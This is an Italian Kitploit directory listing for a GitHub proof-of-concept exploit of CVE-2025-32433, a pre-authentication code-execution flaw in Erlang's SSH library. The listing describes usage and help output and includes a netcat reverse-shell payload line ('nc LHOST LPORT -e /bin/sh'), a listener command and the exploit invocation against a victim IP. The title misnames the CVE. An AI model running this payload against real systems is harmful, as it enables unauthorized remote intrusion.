Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-3243 — Un exploit proof-of-concept per CVE-2025-32433, una vulnerabilità critica nella libreria SSH di Erlang che consente l'esecuzione di codice pre-autenticato tramite pacchetti SSH_MSG_CHANNEL_REQUEST malformati. | Kitploit
Strumenti/GitHubGitHub/tenebrae93/cve-2025-3243
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodePenetration TestingStrumento di Accesso Remoto
GitHubtenebrae93/cve-2025-3243

CVE-2025-3243

Un exploit proof-of-concept per CVE-2025-32433, una vulnerabilità critica nella libreria SSH di Erlang che consente l'esecuzione di codice pre-autenticato tramite pacchetti SSH_MSG_CHANNEL_REQUEST malformati.

Vedi Repository
711 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-32433 Exploit per la Libreria SSH di Erlang

Un proof-of-concept per CVE-2025-32433, una vulnerabilità critica nella libreria SSH di Erlang che consente l'esecuzione di codice prima dell'autenticazione tramite pacchetti SSH_MSG_CHANNEL_REQUEST malformati.


Caratteristiche

  • Exploit originale di Matthew Keeley
  • Versione aggiornata di Tyler Ramsbey:
    • Argomenti da riga di comando per LHOST, LPORT, RHOST e RPORT
    • Help e utilizzo integrati tramite argparse
    • Payload per reverse shell in stile Erlang usando os:cmd("nc LHOST LPORT -e /bin/sh").
    • Scomposizione pulita delle funzioni e logging dello stato per ogni fase

Prerequisiti

  • Python 3
  • Un listener nc (Netcat) funzionante sulla macchina attaccante
  • Accesso di rete al servizio SSH di destinazione (porta predefinita 22)

Utilizzo

  1. Avvia il listener sulla macchina attaccante:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Esegui l'exploit:

    root@kitploit:~
    python3 CVE-2025-32433.py -lh [IP-Attaccante] -lp [Porta-Attaccante] -rh [IP-Vittima] -rp [Porta-Vittima]
    
  3. Attendi la shell che si connetta al tuo listener.

Menu di Aiuto

root@kitploit:~
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Invia una richiesta di canale SSH pre-autenticazione con un payload RCE di Erlang
per ottenere una reverse shell

optional arguments:
  -h, --help            mostra questo messaggio di aiuto ed esci
  -lh LHOST, --lhost LHOST
                        Host/IP locale per ricevere la reverse shell
  -lp LPORT, --lport LPORT
                        Porta locale per ricevere la reverse shell
  -rh RHOST, --rhost RHOST
                        IP del server SSH di destinazione (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Porta del server SSH di destinazione (default: 22)

Crediti

  • Script originale di Matthew Keeley (MattKeeley)
  • Questa versione aggiornata di Tyler Ramsbey

Disclaimer

Usa questo codice solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. Lo sfruttamento non autorizzato delle vulnerabilità è illegale e non etico.

Scarica lo strumento